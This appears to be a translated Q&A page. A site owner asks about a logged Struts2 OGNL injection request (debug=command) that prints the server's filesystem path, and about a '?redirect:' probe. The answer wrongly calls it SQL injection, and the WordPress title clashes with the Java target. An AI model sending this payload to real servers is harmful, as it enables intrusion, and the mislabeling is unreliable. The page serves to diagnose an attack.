今天我登录并第一次看到它:
mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()
之后是另一个:
mysite.com/?redirect:
它会导致什么?注入(inject)数据库?病毒?
最佳答案
看起来有人试图利用 struts2 中的 SQL 注入(inject)漏洞来执行远程代码。
关于java - 被攻击的 WordPress 网站,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/33184893/